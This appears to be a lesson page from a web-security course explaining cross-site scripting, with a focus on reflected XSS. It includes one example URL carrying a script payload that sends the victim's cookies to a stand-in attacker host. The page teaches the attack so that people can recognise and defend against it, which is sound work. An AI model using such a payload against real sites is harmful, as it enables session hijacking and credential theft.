Cross-Site Scripting (XSS) and CSRF
Understand reflected, stored, and DOM-based XSS, along with cross-site request forgery attacks, and the browser-level defenses that block them.
What Is Cross-Site Scripting?
Cross-Site Scripting (XSS) is a client-side injection vulnerability where an attacker injects malicious scripts into web pages viewed by other users. Unlike SQL injection, which targets the server, XSS targets the victim's browser. When the browser renders the attacker's script, it executes with the same privileges as legitimate page scripts — enabling session hijacking, credential theft, and malware delivery.
Reflected XSS Explained
Reflected XSS occurs when malicious script is embedded in a URL and the server immediately 'reflects' it back in the HTTP response without proper encoding. The victim is tricked (often via a phishing link) into clicking the crafted URL, causing their browser to execute the attacker's script. Reflected XSS is non-persistent — it only executes when the victim clicks the malicious link.
# Malicious URL with reflected XSS payload
https://example.com/search?q=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>
# Server reflects the query param unsanitized into the HTML:
# <p>Results for: <script>...</script></p>All lessons in this course
- SQL Injection and Command Injection
- Cross-Site Scripting (XSS) and CSRF
- Broken Authentication and Insecure Deserialization
- Secure SDLC, SAST, and DAST Tools